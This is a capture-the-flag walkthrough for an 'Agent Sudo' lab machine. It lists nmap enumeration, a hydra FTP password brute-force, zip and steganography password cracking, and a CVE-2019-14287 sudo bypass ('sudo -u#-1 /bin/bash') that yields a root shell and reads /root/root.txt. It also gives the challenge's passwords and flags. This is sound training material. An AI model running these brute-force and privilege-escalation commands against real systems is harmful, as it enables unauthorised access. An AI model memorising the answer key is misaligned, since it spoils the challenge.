# Agent Sudo

## INIT

```
export agentsudo=10.10.172.140
ping $agentsudo

echo "10.10.172.140 agentsudo.thm" >> /etc/hosts
```

## Task 2 Enumerate

```
nmap -v -sC -sV -O -T5 -p1-65535 agentsudo.thm
```

### How many open ports?

![](https://244894268-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MO2llY9Epz_XDFDa7VZ%2F-MRzN2zeJqJ8HccYgT3l%2F-MRzOHlAMxaL6Pg8OMEM%2Fimage.png?alt=media\&token=258d06cd-c40b-483e-86a3-adf0f087258d)

{% hint style="success" %}
3
{% endhint %}

### How you redirect yourself to a secret page?

![](https://244894268-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MO2llY9Epz_XDFDa7VZ%2F-MRzN2zeJqJ8HccYgT3l%2F-MRzNgB120bP97Z6AJWP%2Fimage.png?alt=media\&token=061e9fcc-fdc7-49ea-987a-4c866003b328)

> Switch User-Agent to C

![](https://244894268-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MO2llY9Epz_XDFDa7VZ%2F-MRzOIu5hPL3qbYiCJ40%2F-MRzS12sqCEliMZfZmNS%2Fimage.png?alt=media\&token=e70ff114-3452-4325-ae3c-cac0b8ef91bd)

{% hint style="success" %}
User-Agent
{% endhint %}

### What is the agent name?

{% hint style="success" %}
Chris
{% endhint %}

## Task 3 Hash cracking and brute-force

### FTP password

```
hydra -l chris -P /usr/share/wordlists/rockyou.txt ftp://agentsudo.thm -t 50
```

![](https://244894268-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MO2llY9Epz_XDFDa7VZ%2F-MRzSanj7EZlOwIP7kFe%2F-MRzT3pPN_US9LhWkYK0%2Fimage.png?alt=media\&token=b108bb31-2b17-4281-9064-2941144ce462)

{% hint style="success" %}
crystal
{% endhint %}

### Zip file password 

![](https://244894268-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MO2llY9Epz_XDFDa7VZ%2F-MRzSanj7EZlOwIP7kFe%2F-MRzTfi78sFefcOISnJz%2Fimage.png?alt=media\&token=ab5f4fe5-1300-4c7f-a205-60293517b6d1)

```
binwalk -e cutie.png

zip2john 8702.zip > ziphash.txt
john ziphash.txt --wordlist=/usr/share/wordlists/rockyou.txt
```

![](https://244894268-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MO2llY9Epz_XDFDa7VZ%2F-MRzSanj7EZlOwIP7kFe%2F-MRzWwMoqIUHeV1Eps1v%2Fimage.png?alt=media\&token=0601584d-c8b7-413e-8115-09fc303758b0)

{% hint style="success" %}
alien
{% endhint %}

### steg password 

```
steghide extract -sf cute-alien.jpg
```

![](https://244894268-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MO2llY9Epz_XDFDa7VZ%2F-MRzSanj7EZlOwIP7kFe%2F-MRzXQTngm_uMU3iH18i%2Fimage.png?alt=media\&token=13de7365-28c2-4e3b-be90-6d9da0056c83)

{% hint style="success" %}
Area51
{% endhint %}

### Who is the other agent (in full name)? 

{% hint style="success" %}
james
{% endhint %}

### SSH password

{% hint style="success" %}
hackerrules!
{% endhint %}

## Task 4 Capture the user flag

### What is the user flag?

![](https://244894268-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MO2llY9Epz_XDFDa7VZ%2F-MRzYqoZ-kJA9QpYMqYO%2F-MRzZ-jpHTKKG3GaEHAu%2Fimage.png?alt=media\&token=5002476f-85b1-4cd8-8561-c574ffe068bd)

{% hint style="success" %}
b03d975e8c92a7c04146cfa7a5a313c7
{% endhint %}

### What is the incident of the photo called?

```
scp james@agentsudo.thm:/home/james/Alien_autospy.jpg .
```

![](https://244894268-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MO2llY9Epz_XDFDa7VZ%2F-MRzZ6ljuWjW9zwqBNYC%2F-MRz_ZcSfyEDQdrqKPRa%2Fimage.png?alt=media\&token=865968bd-04c7-4c69-b078-3383bb6a6291)

{% hint style="success" %}
Roswell Alien Autopsy
{% endhint %}

## Task 5 Privilege escalation

```
sudo -l
```

![](https://244894268-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MO2llY9Epz_XDFDa7VZ%2F-MRz_aWHlrYxzuE_eoC0%2F-MRzaZyVEw4Ax_Wl5TlK%2Fimage.png?alt=media\&token=1c033f7c-a227-4e64-bab8-d4cf11e81038)

### CVE number for the escalation 

![](https://244894268-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MO2llY9Epz_XDFDa7VZ%2F-MRz_aWHlrYxzuE_eoC0%2F-MRzbDqrR5OTTf3FlFa1%2Fimage.png?alt=media\&token=cc0a5e05-bd93-4f1d-9dc4-91d49a597214)

![](https://244894268-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MO2llY9Epz_XDFDa7VZ%2F-MRz_aWHlrYxzuE_eoC0%2F-MRzaSDYxBx8-r0et703%2Fimage.png?alt=media\&token=0e796172-b48f-4650-a657-f9ce30c98120)

{% hint style="success" %}
CVE-2019-14287
{% endhint %}

### What is the root flag? 

```
sudo -u#-1 /bin/bash
cat /root/root.txt
```

{% hint style="success" %}
b53a02f55b57d4439e3341834d70c062
{% endhint %}

### (Bonus) Who is Agent R?

![](https://244894268-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MO2llY9Epz_XDFDa7VZ%2F-MRzbWyNiI0NUhykdEdG%2F-MRzbm-8ek-rZtt4faBl%2Fimage.png?alt=media\&token=1f26731e-af42-44ad-8103-37a6e15781f1)

{% hint style="success" %}
DesKel
{% endhint %}